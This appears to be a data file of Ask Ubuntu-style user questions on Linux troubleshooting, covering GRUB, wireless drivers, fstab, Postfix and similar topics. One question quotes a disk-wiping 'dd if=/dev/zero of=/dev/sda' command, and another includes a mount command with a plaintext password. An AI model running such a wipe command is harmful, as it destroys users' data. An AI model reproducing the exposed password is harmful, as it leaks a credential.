231329	xlsread unable to read file in matlab r2012a in ubuntu 12.10 ?	i have an excel-file which consists of about roughly 10,000 rows and has a size of around 800kb when i try to import the data to matlab both with gui import tool , or using xlsread i get the following message : could not open the spreadsheet . matlab reported the following error : xlsread unable to read sheet `` sheet1 '' file contains unexpected record length . try saving as excel 98 i tried saving as excel 98 , but did n't help ? ... funny thing is , i can import other excel-files which are bigger than 10,000 rows and 800kb in size ? ! ... ideas ? = ) my excel-file should n't consist anything special , just columns of numeric data with headers consisting of text ... note : it seems this only comes when i use matlab in ubuntu 12.10 ... when i tried it in windows xp it works just fine ... . ? ? update : xlsread in ubuntu just does n't seem to like big excel files ... if i reduce the number of rows ... voila ... = ( update2 : the limit value of rows seems to be 746 rows . if i have 746 rows in file , reading is okay , if i have > 746 , no game ...
231331	how to fix “the system is running in low-graphics mode” error ?	i am facing “the system is running in low-graphics mode” error on my dell xps m 1530 dual boot laptop . i referred how to fix `` the system is running in low-graphics mode '' error ? but not able to fix the problem yet . i tried sudo apt-get install -- reinstall ubuntu-desktop sudo reboot i also verified that greeter is valid . greeter-session=unity-greeter i installed the nvidia driver sudo apt-get install nvidia-current - more stable/tested version sudo apt-get install nvidia-current-updates - more up-to-date version still when i tried to reboot in safe mode it did not help . if i run startx from command line i see the error module nvidia_173 not found . no screens found . any thoughts on how can i fix this . thanks . edit : @ private : could you please tell how can i verify if nvidia has optimus or not .
231334	bug 12.10 . no reply to the bug report or alternative to submit the report or bug not answered	first , i am new to ubuntu , and then i was getting a recurring error : window titled `` crash report '' ( it 's contents are as below ) . there is stop sign being shown at the top next to the battery indicator . then i ca n't open the software updates and i 'm not able to get updates via terminal.i have tried the 'package manager troubleshooting ' help but i do n't know how exactly it works and hence i am not able to do anything . the error looks like this : executable path /usr/lib/evolution/evolution-calender-factory problem type crash architecture amd64 core dump ( binary data ) crash counter 1 date fri , dec 21 ... disassembly there is a lot description under this and difficult to write but it has something like divl mov mov test jne jmpg
231335	upgrade the gnutls in use by 12.04	i have xubuntu 12.04 and am trying to use gdrive . during its work , i 'm getting this : gnutls_handshake : a tls packet with unexpected length was received . research online , including on this website ( http : //askubuntu.com/questions/136082/ubuntu-12-4-and-gnus-and-maybe-gnutls , mutt not working due to `` gnutls_handshake : a tls packet with unexpected length was received . '' error ) shows there 's a bug with gnutls in the 12.04 release . i posted this information to the gdrive development forum but doubt they will start using openssl because of this . so instead , i 'd like to look into upgrading gnutls to fix this bug . problem is - i have no clue how to do that in a way that would n't break the entire os . any directions would be appreciated !
231338	libvpx not getting installed in ubuntu 12.04	when i use the command : sudo apt-get -f install libvpx* i get the following error : unpacking libvpx1 ( from ... /libvpx1_1.0.0-1_amd64.deb ) ... dpkg : error processing /var/cache/apt/archives/libvpx1_1.0.0-1_amd64.deb ( -- unpack ) : trying to overwrite '/usr/lib/libvpx.so.1.0.0 ' , which is also in package libvpx 110-1 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) but i checked /usr/lib there is no libvpx.so.1.0.0 present in the directory .
231340	how to run an automated internet-radio station in a server environment ?	i 'm running an ubuntu server environment with icecast-2.3.2 and ices-0.4.0 to enable internet-radio streaming . i have a directory with music files , mostly mp3 , let 's call it /path/to/music . i also have directories with jingles and podcasts . /path/to/jingles and /path/to/podcasts . so far my server is up and running . what works : creating daily random playlists from the music-directory using a script and a cron-job . running an icecast2-server and streaming the playlist file using ices . my question now is : how to play podcasts and jingles at specific times ? for example every full hour a certain jingle , or every thursday at 8 p.m. a certain podcast ? i 've tried to search the internet on this topic but it seems there is no `` one final solution '' for this radio-automation issue and it also seems a lot of solutions are rather hacky , are n't they ? keep in mind this is a server environment , solutions with gui wont help . i appreciate any hints and experiences on this topic !
231341	rsync between 2 servers with different os versions	i is it possible to rsync data between two servers running ubuntu 10.04.4 lts and ubuntu 10.04 lts ? or they have to be of the exact operating system like ubuntu 10.04 lts for both of them .
231345	where can i find `` ip_queue '' module ?	when i run : modprobe ip_queue , i get the error fatal : module ip_queue not found , but i installed libnetfilter-queue-dev . how can i fix it ?
231346	transparency problem with the terminal !	transparency sliding bar is at full ( option available in profile preferences ) . even then terminal has solid color . it was working well a day before . how to roll back ?
231347	what is the difference between these two commands	first command sudo dd if=/dev/zero of=/dev/sda second command sudo dd if=/dev/zero of=/dev/sda bs=1m i am formatting my pc for 4 hours with first code but it did n't finish . is the first code wrong ? what is the difference ?
231350	how to make kmplayer work with wine	is there by any chance a way i can make the video player kmplayer work on kubuntu 12.04.1 lts with wine ?
231354	php 5.4 in official repository	when php will be updated to version 5.4.x in official repositories ?
231361	how to change the netbeans ide language ?	i 'm using ubuntu 12.04 and netbeans ide 7.2.1 . my system is set to pt-br , and my netbeans installation too . i want to use netbeans in english , how is this possible ? i ca n't find any settings to change the language .
231362	how can i create a recovery dvd of my ubuntu installation ?	my pc will be repaired , so i have to create a recovery dvd . how can i do this ?
231365	install arcreader to ubuntu 12.10	i try to install arcreader to ubuntu 12.10 64bit . but i have some errors during installing the program . it finished istallation but it doesnent work in 64 bit system ( arcreader is not properly installed ) . from requirements of program i can install only in redhat and suse . from esri : arcreader is a free , easy-to-use desktop mapping application that allows users to view , explore , and print maps and globes . anyone with arcreader can view high-quality interactive maps authored by a high-level arcgis for desktop product and published with the arcgis publisher extension . images of error's
231368	i ca n't bypass grub2 even with timeout=0	i 've run into problems with grub 2 on a family computer . i recently installed lubuntu as the machine was too old to run ubuntu nicely and my family do n't really need it to do anything beyond run bbc iplayer and not crash . but frustratingly , i ca n't get it to boot quickly because despite grub_timeout=0 , the grub2.00-7~ screen just sits there until you manually select the first option . any tips ? i 'm sure it must be something simple , but i ca n't find a similar thread . i do n't have a livecd to reinstall , was installed a while ago by usb , and i 'd rather not risk goin in alone/blind with commands that could render the system unusable ... so is there a ... like , a default grub that i can copy and paste over the existing grub.cfg text and sudo update-grub ? edit : my grub looks ilke this : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default=0 grub_hidden_timeout=1 grub_hidden_timeout_quiet=true grub_timeout=0 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode=640x480 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 '' i 've been using sudo leafpad /etc/default/grub to edit . many thanks for your time and your understanding .
231369	ubuntu 12.04 lts - hp probook 4515s - wlan problem	i installed ubuntu 12.04 on my hp probook 4515s but the wlan ( i think it is a broadcom 4312 ) does n't works . so i tried this : wireless not working - hp probook 4540s .. and had the same problem : fatal : module rt3259sta not found . the card is n't even listed when i call lspci : 00:00.0 host bridge : advanced micro devices [ amd ] rs880 host bridge 00:01.0 pci bridge : advanced micro devices [ amd ] rs780/rs880 pci to pci bridge ( int gfx ) 00:04.0 pci bridge : advanced micro devices [ amd ] rs780/rs880 pci to pci bridge ( pcie port 0 ) 00:07.0 pci bridge : advanced micro devices [ amd ] rs780 pci to pci bridge ( pcie port 3 ) 00:09.0 pci bridge : advanced micro devices [ amd ] rs780/rs880 pci to pci bridge ( pcie port 4 ) 00:11.0 sata controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 sata controller [ ahci mode ] 00:12.0 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:12.1 usb controller : advanced micro devices [ amd ] nee ati sb7x0 usb ohci1 controller 00:12.2 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ehci controller 00:13.0 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:13.1 usb controller : advanced micro devices [ amd ] nee ati sb7x0 usb ohci1 controller 00:13.2 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ehci controller 00:14.0 smbus : advanced micro devices [ amd ] nee ati sbx00 smbus controller ( rev 3c ) 00:14.2 audio device : advanced micro devices [ amd ] nee ati sbx00 azalia ( intel hda ) 00:14.3 isa bridge : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 lpc host controller 00:14.4 pci bridge : advanced micro devices [ amd ] nee ati sbx00 pci to pci bridge 00:14.5 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci2 controller 00:18.0 host bridge : advanced micro devices [ amd ] family 10h processor hypertransport configuration 00:18.1 host bridge : advanced micro devices [ amd ] family 10h processor address map 00:18.2 host bridge : advanced micro devices [ amd ] family 10h processor dram controller 00:18.3 host bridge : advanced micro devices [ amd ] family 10h processor miscellaneous control 00:18.4 host bridge : advanced micro devices [ amd ] family 10h processor link control 01:05.0 vga compatible controller : advanced micro devices [ amd ] nee ati rs880m [ mobility radeon hd 4200 series ] 01:05.1 audio device : advanced micro devices [ amd ] nee ati rs880 hdmi audio [ radeon hd 4200 series ] 02:00.0 ethernet controller : marvell technology group ltd. 88e8072 pci-e gigabit ethernet controller ( rev 10 ) i also tried : sudo apt-get update sudo apt-get -- reinstall install bcmwl-kernel-source
231371	no dvd since upgrade to kernel 3.7	my problem is the following , since an upgrade to kernel 3.7 , my cdrom/dvd drive has dissapeared . there is no trace of /dev/sr0 /dev/cdrom0 and others . the drive does not show up in dmesg . i see many errors like prereset failed erro = -19 and ae0x300b . i tried several things , like adding modprobe.blacklist=pata_acpi to grub : grub_cmdline_linux= '' modprobe.blacklist=pata_acpi '' i also tried upgrading to ( i believe not supported ) 3.7.1-030701-generic and a downgrade to 3.5.4 ( here my dvd shows up , but the network is not working ) . as everything was working in 3.5 , i would like to install 3.5.0.21-generic , but i can not find instructions / location how to do this . any suggestions ? ( both are appreciated : going forward to solve my dvd drive problem or downgrade the kernel ) .
231379	lubuntu 12.10 : wo n't boot , wo n't let to boot from livecd/usb either	after a force reboot lubuntu `` boots '' into a black screen with a blinking cursor . when trying to boot from livecd/usb i get the same result , so i ca n't access the system at all . bios update did n't help . can you help me ? edit : i had successful boots prior to that one and i used the exact same liveusb , so i doubt there were installation/liveusb problems . how do i access the terminal when in `` blinking cursor mode '' ?
231382	with kernel 3.5.0-21 the wireless card realtek rtl8723ae-bt stop working	yesterday , i updated my ubuntu 12.04 to the kernel 3.5.0-21 and the wireless card stop working ... in other threads i saw the same problem with another kernels . anyone have the new driver ? i sent a mail to realtek but i have not received an answer yet ... the model is : realtek rtl8723ae wireless lan 802.11n pci-e nic thanks
231386	virtualbox and ubuntu	ok im having some tough times here and could use some guidence . i have my laptop running ubuntu 12.10 and i installed oracle virtualbox and windows 7 within it . i cant seem to get any of my usb devices to showup or work in the virtual box . also , my virtualbox doesnt connect to the internet at all . i have updated my vb and installed all the addons i could find . im new to running a vb so please , any help would be greatly appreciated .
231391	unable to mount location , ca n't mount file	i 'm a new user to ubuntu and i have a problem : i had windows xp in my computer and i had two partitions : c ( for system data ) and d ( for my personal stuff ) , then , during the ubuntu installation i chose the advanced settings and formated c partition and left d partition intact , went back and chose install ubuntu and replace windows and it installed fine . the problem is that now i open nautilus and go to computer , in there it shows my d partition , 640 hard disk , but when i try to mount it displays me a message : `` unable to mount location . ca n't mount file '' . i ask you to explain me step-by-step what i need to do because i 'm not an advanced user . my computer specs : 2 gib ram , proccesor pentium ( r ) dual-core cpu e5400 @ 2.70ghz ă 2 , graphics unknow ( it 's nvidia geforce 220 { 1gb } or something ) , os type 32-bit , disk 628.0 gb p.s . : my hdd is internal , i 'm not using external hard drives . thank you ! ! ! mike
231392	wine questions ( rosetta stone )	i just got rosetta stone and was wondering how compatible it is with wine . and whether or not it would only work when installed on windows/wine .
231395	the disk drive for /media/sdbackup is not ready yet or not present	on an acer aspire one 522 netbook , the boot process stalls with the message : `` the disk drive for /media/sdbackup is not ready yet or not present . continue to wait , press s to skip or m for manual recovery . '' if i eject the relevant sdcard and re-insert it ( essentially using the wait option ) , boot-up continues normally , and the card is mounted . if i press esc , the message displayed is : fsck from util-linux 2.20.1 ubuntu : clean , 382442/1343488 files , 1480572/5349632 blocks if i press m , the message displayed is : filesystem check or mount failed interestingly , on a dell inspiron laptop , a similar sdcard is mounted automatically on boot-up without the above-noted message appearing . to provide some background on the netbook system , listings from the fdisk command and the contents of the fstab file are appended below . note that using `` /dev/sdb1 /media/sdbackup/ ... '' or `` uuid=aac4-9403 /media/sdbackup/ ... '' in fstab produces the same boot-time message ; however , the latter entry also produces double listings for sdbackup in the ( gnome classic ) `` places '' menu . consequently , it is currently commented out in fstab . i have run fsck on the card . this did not identify any errors . i have also re-formatted the card . i used a different sdcard in the card reader . nothing seems to make a difference to the boot process stalling . there seem to be multiple bug reports about similar issues with this boot-time warning message but i am unable ( in what appears to me to be a complex logging system ) to determine if there has been any fix . can anyone suggest another approach to mount the sdcard automatically on boot-up ? the intention is to have this available for `` real-time '' backup of a data partition using inosync . output from fdisk -l disk /dev/sda : 120.0 gb , 120034123776 bytes 255 heads , 63 sectors/track , 14593 cylinders , total 234441648 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x6adaea7a device boot start end blocks id system /dev/sda1 2048 30722047 15360000 12 compaq diagnostics /dev/sda2 * 30722048 30926847 102400 7 hpfs/ntfs/exfat /dev/sda3 30926848 164806655 66939904 7 hpfs/ntfs/exfat /dev/sda4 164808704 234440703 34816000 5 extended /dev/sda5 164810752 182761471 8975360 7 hpfs/ntfs/exfat /dev/sda6 182763520 191641599 4439040 82 linux swap / solaris /dev/sda7 191643648 234440703 21398528 83 linux disk /dev/sdb : 7985 mb , 7985954816 bytes 231 heads , 28 sectors/track , 2411 cylinders , total 15597568 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdb1 8192 15597567 7794688 b w95 fat32 listing of /etc/fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda7 during installation uuid=691436b3-52fe-4d4c-9a0c-70a778ca0e57 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda6 during installation uuid=a791c8fd-18f1-418e-bd2e-2451890f14dd none swap sw 0 0 # entries for datadisk and sdbackup /dev/sda5 /media/datadisk/ ntfs-3g defaults , user , locale=en_us.utf8 0 0 /dev/sdb1 /media/sdbackup/ vfat auto , users , uid=1000 , gid=100 , dmask=027 , fmask=137 , utf8 0 0 # uuid=aac4-9403 /media/sdbackup/ vfat auto , users , uid=1000 , gid=100 , dmask=027 , fmask=137 , utf8 0 0
231397	ubuntu 12.04 key bindings not working in intellij idea 12	i 've installed the latest version of intellij idea community edition ( 12.0.1 ) and i have problems with key bindings there . i am using ubuntu 12.04 lts with unity . none of them , where a letter is involved ( ctrl-a , ctrl-c , ctrl-v ) are working in idea . and they are working in all other applications . i can copy/paste text in idea with mouse and it shows me that key bindings for this are ctrl-c/ctrl-v , but they are just not working . i have no idea what is the problem , so any help will be appreciated .
231401	how to boot from cd using grub ?	so i have this dualboot config in my pc with ubuntu precise and win 7 running alongside . i need to reinstall win 7 since its acting a bit strange lately ; but during bios my keystrokes are not recognized for some reason . since i ca n't change the boot order this way , my only option is grub to boot into the win setup . any ideas on how though ? thanks .
231402	how can i disable postfix on startup ?	i ca n't get cron to stop spamming me with completed job notifications . it 's getting out of hand and starting to clog up my 'real ' email server , so i 'd like to just disable postfix while i figure out which job is n't going to /dev/null ( any help on this is appreciated as well . ) i can stop the service , but everytime i reboot it kicks out all the emails it 's been holding on to , and my mail server goes down ago . how do i keep postfix from starting on boot , and how can i view its held messages ?
231405	what are the pros and cons of each usb disk format ?	in disk utility when you choose format drive , there are four options . i would like to know what 's best and fastest for usb flash drives , usb hdd and any differences between each format type . the options are : master boot record guid partition table do n't partition apple partition map
231408	x server does n't restart	i recently installed nvidia 's cuda toolkit in ubuntu 12.04 . after restarting the computer , it stays in console mode . when i run sudo service lightdm restart , it gets stuck mid execution and the computer remains in console mode after a forced reboot . what can be done here ?
231415	how to stop workspaces miinimap showing every time i switch workspaces	i have ubuntu 12.10 installed . if i click on a program that 's not running in the current workspace , minimap of workspaces gets shown in the middle of the screen . can i turn off that minimap ?
231417	screen randomly becomes black with cursor in ubuntu 12.10	sometimes when i am using ubuntu 12.10 the screen will randomly become black with a cursor . the cursor represents whatever is below , such as a blinking text cursor if i am hovering over gedit , or a pointer if i hovering over opera . i can even interact normally with the applications . everything continues working , but i can not see it . this problem occurs somewhat randomly . the only thing that is similar each time is that it happens during a mouse release . usually when using mouse shortcuts in opera , or dragging a file into gedit . it does not happen when i am unlocking the pc from suspend , automatic lock , or a manual lock . i can restart it with by entering tty1 and running sudo restart lightdm , but that is inconvenient . does anybody know a fix or why this occurring ? ubuntu does not seem to recognise it as a bug . relevant system info : ati radeon hd 7850 ( stock oc ) amd catalyst 12.10 proprietary drivers ubuntu 12.10
231418	laptop touchpad enable/disable problems	whenever i use my external mouse with my laptop , i physically disable the touchpad by pressing a button . ubuntu detects this switch correctly , and will display an overlay that shows the current state of the touchpad ( enabled or disabled ) . however , i do not enable it again before shutting down the system . when i reboot , the touchpad is physically enabled by default , but ubuntu remembers it as disabled . ubuntu loads with the system thinking `` touchpad disabled '' , so i can not move the pointer . when i physically disable it , the system thinks it 's enabled , but of course i can not do anything with it either . is there a way to make the system forget the touchpad state on shutdown and then have it detect that properly on boot ? i think this is strange and even idiotic behaviour , the system should not rely on some file on the hard disk to detect whether the touchpad is enabled . persisting such state by default is useless in my opinion . there are other people that had similar problems , but they used software . i use only the default system settings . i know that it is possible to make the state of the touchpad depend on the external mouse being plugged in or not , but my external mouse has a very small connector that is designed to stay plugged in at all times . very handy as it does n't get lost and i do n't have to pull it out and push it in all the time .
231424	lost ubuntu option from boot	i was using ubuntu 12.10 until i lost all options from boot in somehow , but i 've restored my ( 2 ) windows 7 options successfully using windows 7 format dvd and solved the problem using command prompt and some commands , but i do n't know how to get the ubuntu option back , u know it is installed on my computer but i ca n't use it , i ca n't open it
231425	how do i decrease touchpad sensitivity in kde/kubuntu on dell inspiron ?	keypad sensitivity is perfect when using gnome on latest stable ubuntu . when i change to kde , however , sensitivity is so high , i ca n't get anywhere near touchpad without causing changes to cursor .
231428	cryptkeeper no longer recognizes the encfs folders on my portable drive	i have a portable usb hard drive that contains several encfs folders , which i manage using cryptkeeper . yesterday i upgraded my desktop machine to ubuntu 12.10 , and today i find that cryptkeeper longer recognizes the encfs folders on my portable drive , although it still recognizes the encfs folders on the desktop 's internal hard drive . the portable drive is apparently being mounted correctly when i plug it in . an icon appears on the unity bar , and the drive is browsable through nautilus . clicking on the cryptkeeper notification icon drops down a list of encfs folders , as it should . the encfs folders on the internal hard drive are bolded and can be opened as normal . the encfs folders on the portable drive are listed , but are greyed out . i have tried : importing the encfs folders from the portable drive again . when this option is selected , i can navigate to the portable drive , but the encfs folders are not shown in the import selection window . creating a new encfs folder on the portable drive . this worked normally ; the new file was created , and the new folder shows up in bold on the cryptkeeper and can be opened and closed normally . a possibly related issue is that the unity icon for the portable drive no longer contains a `` safely remove '' option when right clicked..however , this may be a change with the upgrade to ubuntu 12.10 another possibly related issue is that when right clicking the unity icon for the portable drive , and selecting `` unmount '' there is some disk activity on the portable drive , but the unit icon does not disappear as you would expect , until the drive is physically unplugged from the machine . finally , the encfs folders on the portable drive function normally on my laptop , which is still running ubuntu 12.04.1 lts . the cryptkeeper version on both machines is 0.9.5 obviously , something has changed with the upgrade to 12.10 . what can i do to restore the functionality of the encfs folders from the portable drive on the desktop machine ? i am holding off upgrading the laptop until this functionality is restored . edit : just noticed that the unity icon for the portable drive on the desktop , running 12.10 also does not show a `` format '' option when right clicked , as the unity icon does on the laptop running 12.04 . again , this may just be a difference between 12.10 and 12.04 , or it may be related to the problem .
231429	terminal not configured - not showing folder , no tab completion , etc	i access via ssh ( command line ) a linux machine and the user is not configured to do anything . backspace does not work , there is no tab completion , the current folder does not appear in the terminal ( just a $ sign ) . there is also no bash history . the ubuntu version 12.04 and i only have ssh access to it , i can not access its graphical interface . when i log in it goes automatically to a tomcat folder , but there is a home folder where i tried copying a properly configured .bashrc file with no success . how can i add this functionalities to my terminal from command line ? thanks !
231434	failed to upgrade to 12.04 , stuck at 11.10	so my problem occurs as i already mentioned in my title after i tried to upgrad my old version . for no reason the upgrade broke of after the installation . now i am not able to upgrade anything the upgrade manager is always closing when i am trying to open it . hope you guys can help , with kind regards
231436	how create a keyboard shortcout to launch an .jar file with oracle java 7 runtine ?	i know how to create a keyboard shortcut to launch an application . ( all settings- > keyboard- > shortcuts- > custom shortcuts ) i know how to run .jar files from nautilius . ( right click- > open with oracle java 7 runtine ) but what i do n't know is what command i must put in the `` custom shortcuts '' command text box to run the .jar file , or what is the same , how run from the console a .jar file using oracle java 7 runtine ?
231439	not loading desktop from login screen	i was using ubuntu 12.10 for quite a long time . but from a few days back , i am unable to go to the desktop . the ubuntu is loaded and the login screen is shown . even after entering the password , the desktop is not loaded , but the same screen is visible and i am unable to click on anything even though i can move the mouse pointer
231441	have pm utils power.d scripts run all the time	the pm util power saving scripts only work when a laptop is on battery , not when it is plugged in to ac . is there a way to make pm utils run all the time , regardless of whether the laptop is connected to a power outlet or not ?
231448	can not find firefox in lubuntu desktop	i have just installed lubuntu-desktop on top of ubuntu 12.04 . i understand that chromium is the default browser in lubuntu but i was expecting firefox to show up under the internet menu . it is installed in my computer , and it shows in the lubuntu software center under installed applications but i can not find it anywhere . how do i have it show up on the internet menu ?
231451	when did ubuntu become a `` by canonical '' product ?	i keep reading in the news about this `` ubuntu by canonical '' thing , and it seems to me that this is n't entirely accurate . i have , for instance , spent about fifteen thousand hours working for ubuntu , but i 've never – not even for an hour – been employed by canonical , though i would like to some day . seems like a good company with good values . actually , except for some very special cases , i 've never accepted any payment for any work i 've ever done in this community . because i do still consider this a community project with a strong sponsor and not a company surrounded by fanboys . has this changed ? if so , when did that happen ? to my eyes , canonical supports ubuntu and ubuntu supports canonical , but ubuntu is not a `` by canonical '' product . am i wrong about this now , or am i still in the black ?
231452	again `` how to get grub2 to remember last choice ? ''	this question was already asked once but it has n't helped me in my trouble . i have ubuntu and windows 7 on my laptop . usually i use windows 7 but grub always boots ubuntu by default . my /ect/default/grub contains the following lines : grub_default=saved grub_savedefault=true i did run sudo update-grub after i changed the values for these variables . also i made sure that my grubenv file existed and had right permissions ( with save_env grub command ) . and still ... it does n't work ! grub alwas intends to load ubuntu despite i choosed windows last time . what else do i lose sight of ? btw , i do n't have neither raid nor lvm volumes ( at least i do n't have lvm manager installed ) .
231458	not able to see home share on readynas dou	i have just bought a readynas and am trying to mount the user home share created on the nas , which gives me some problems . i try with sudo mount -t cifs -o username=far , password=kanto2000 //192.168.1.14/far /home/tove/far far = share on nas and have also created a folder ( far ) on my laptop , user name as password is also correct . after running the code , i can see a drive named far , but if i try to open it i get error that i dont have the rights to see the folder ? i am able to do so from my windows7 laptop. ? can anyone assist
231466	x230 tablet , realtek 8192ce connects to router but no internet	the issue : i can ping all devices on the network except the gateway ( 192.168.0.1 ) and in turn can not access outside of the network without proxying through another device . the system : lenovo x230 tablet with a realtek wifi adapter running on quantal : network controller : realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter ( rev 01 ) the wtf : i can obtain an ip from the router wlan0 link encap : ethernet hwaddr e0:06 : e6 : c2 : d2 : e0 inet addr:192.168.0.102 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :e206 : e6ff : fec2 : d2e0/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:178844 errors:0 dropped:0 overruns:0 frame:0 tx packets:101517 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:121465876 ( 121.4 mb ) tx bytes:10612848 ( 10.6 mb ) i can ping other devices : ➜ ~ ping 192.168.0.101 ping 192.168.0.101 ( 192.168.0.101 ) 56 ( 84 ) bytes of data . 64 bytes from 192.168.0.101 : icmp_req=1 ttl=64 time=3.84 ms 64 bytes from 192.168.0.101 : icmp_req=2 ttl=64 time=1.32 ms i can not ping the gateway : ➜ ~ ping 192.168.0.1 ping 192.168.0.1 ( 192.168.0.1 ) 56 ( 84 ) bytes of data . from 192.168.0.102 icmp_seq=1 destination host unreachable from 192.168.0.102 icmp_seq=2 destination host unreachable my resolv.conf is autogenerated with : ➜ ~ cat /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.1.1 search nc.rr.com my /etc/hosts : ➜ ~ cat /etc/hosts 127.0.0.1 localhost 127.0.1.1 quantal my routing table : ➜ ~ route kernel ip routing table destination gateway genmask flags metric ref use iface default 192.168.0.1 0.0.0.0 ug 0 0 0 wlan0 link-local * 255.255.0.0 u 1000 0 0 wlan0 192.168.0.0 * 255.255.255.0 u 9 0 0 wlan0 lastly , my module info for device : ➜ ~ modinfo rtl8192ce filename : /lib/modules/3.5.0-17-generic/kernel/drivers/net/wireless/rtlwifi/rtl8192ce/rtl8192ce.ko firmware : rtlwifi/rtl8192cfw.bin description : realtek 8192c/8188c 802.11n pci wireless license : gpl author : larry finger < larry.finger @ lwfinger.net > author : realtek wlanfae < wlanfae @ realtek.com > author : lizhaoming < chaoming_li @ realsil.com.cn > srcversion : dd4f3d83a75531ac98862f2 alias : pci : v000010ecd00008176sv*sd*bc*sc*i* alias : pci : v000010ecd00008177sv*sd*bc*sc*i* alias : pci : v000010ecd00008178sv*sd*bc*sc*i* alias : pci : v000010ecd00008191sv*sd*bc*sc*i* depends : rtlwifi , mac80211 vermagic : 3.5.0-17-generic smp mod_unload modversions parm : swlps : bool parm : swenc : using hardware crypto ( default 0 [ hardware ] ) ( bool ) parm : ips : using no link power save ( default 1 is open ) ( bool ) parm : fwlps : using linked fw control power save ( default 1 is open ) ( bool ) things i 've attempted : turning off fwlps , ips . attempted to compile a driver from upstream ( realtek.com ) and even tried the latest daily mainline kernel for quantal . also tried latest compat-wireless and switching out firmware . tested windows 7 and verified the card worked . tested slackware 14 , fedora , arch and they all exhibit the same issue . has anyone seen this before ? what really baffles me is that i can not ping the gateway . to verify i can ping the gateway from another system : λ ~ → ping 192.168.0.1 ping 192.168.0.1 ( 192.168.0.1 ) 56 ( 84 ) bytes of data . 64 bytes from 192.168.0.1 : icmp_req=1 ttl=64 time=1.35 ms 64 bytes from 192.168.0.1 : icmp_req=2 ttl=64 time=1.22 ms 64 bytes from 192.168.0.1 : icmp_req=3 ttl=64 time=5.11 ms this also does n't happen outside of my network as i was able to use this laptop at uds-r which kind of points to a router issue but anything without a realtek adapter works : \ i dont know if any realtek developers monitor this site but has anyone run into an issue like this ? thanks adam
231467	getting an error when trying to install nut	im trying to install nut on a headless machine with ubuntu server 12.04 and i keep geeting this error : $ sudo apt-get install nut reading package lists ... done building dependency tree reading state information ... done nut is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 2 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up nut-server ( 2.6.3-1ubuntu1.1 ) ... grep : /etc/nut/nut.conf : no such file or directory sed : ca n't read /etc/nut/nut.conf : no such file or directory dpkg : error processing nut-server ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of nut : nut depends on nut-server ; however : package nut-server is not configured yet . dpkg : error processing nut ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : nut-server nut e : sub-process /usr/bin/dpkg returned an error code ( 1 )
231476	can i replace windows 8 with ubuntu ?	i currently have a duel boot process with windows 7 and 8 . i wish to replace 8 with ubuntu because 8 has been disappointing me greatly . it 's taking up space that i could use for something better like , ubuntu ! i was thinking just booting 8 and installing ubuntu from there but i wanted to make sure . any advice on this one ? i do n't want windows 7 to be deleted .
231478	touchpad disabled every time after i close the lid	every time i close my laptop 's lid my touchpad is disabled . it is very annoying because i have to manually enable it using the keyboard . in system settings it says my touchpad is enabled , i have to disable and enable it again every time to make it work . it does not affect my mouse .
